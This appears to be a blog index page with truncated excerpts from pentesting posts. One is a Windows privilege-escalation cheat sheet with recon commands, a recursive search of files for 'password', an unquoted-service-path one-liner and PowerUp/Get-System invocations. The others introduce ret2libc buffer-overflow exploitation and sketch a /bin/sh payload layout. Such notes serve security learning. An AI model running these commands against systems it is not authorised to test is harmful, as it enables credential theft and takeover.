Recon

# Systeminfo
systeminfo
hostname 

# Especially good with hotfix info
wmic qfe get Caption,Description,HotFixID,InstalledOn

# What users/localgroups are on the machine?
net users
net localgroups
net localgroup Administrators
net user morph3

# Crosscheck local and domain too
net user morph3 /domain
net group Administrators /domain

# Network information
ipconfig /all
route print
arp -A

# To see what tokens we have 
whoami /priv

# Recursive string scan
findstr /spin "password" *.*

# Running processes
tasklist /SVC

# Network connections
netstat -ano

# Search for writeable directories
dir /a-r-d /s /b

### Some good one-liners

# Obtain the path of the executable called by a Windows service (good for checking Unquoted Paths):
sc query state= all | findstr "SERVICE_NAME:" >> a & FOR /F "tokens=2 delims= " %i in (a) DO @echo %i >> b & FOR /F %i in (b) DO @(@echo %i & @echo --------- & @sc qc %i | findstr "BINARY_PATH_NAME" & @echo.) & del a 2>nul & del b 2>nul

Elevation of Privileges

     General

# PowerShellMafia
# Use always dev branch others are shit.
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
powershell.exe -c "Import-Module C:\Users\Public\PowerUp.ps1; Invoke-AllChecks"
powershell.exe -c "Import-Module C:\Users\Public\Get-System.ps1; Get-System"

# Sherlock
https://github.com/rasta-mouse/Sherlock

# Unquoted paths
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v 

     Kerberoast

Read more »

Introduction

There are many things to be done in binary analyzation but I will just mainly focus on Ret2Libc attack.
You can use many other tools but I will use those mainly.

  • pwntools (python library)
  • A reverse engineering tool (gHidra , IDA etc.)
  • gdb-peda
  • ldd
  • readelf
  • strings
  • objdump
  • ropper
  • one_gadget

Analyzation

First thing first,
We need to analyze our binary in order to determine what kind of attack vector we need to use.

Read more »

How Buffer Overflow Works

        Overwriting the return address of the stack with overflowing the buffer allows us to return another malicious address which ends up with code execution.

Keep that in mind if NX is enabled we can't just directly jump to shellcode

Stack state

1
2
3
4
5
6
7
8
9
10
11
12
|                  |        
| | |
| | |
| BUFFER | |
| | |
| | |
| | | Oops, I overflowed it
|__________________| |
|_______esb________| -------|---> Junk buffer ends here
|_______ret________| -------V----> We overwrite the ret address with the one we want to call
| |
|__________________|

1
2
3
4
5
6
7
8
junk_buf + system_call + exit_addr + /bin/sh 
| | ^ ^
| | | |
| |first argument| |
| |______________| |
| |
| second argument |
|__________________________|
Read more »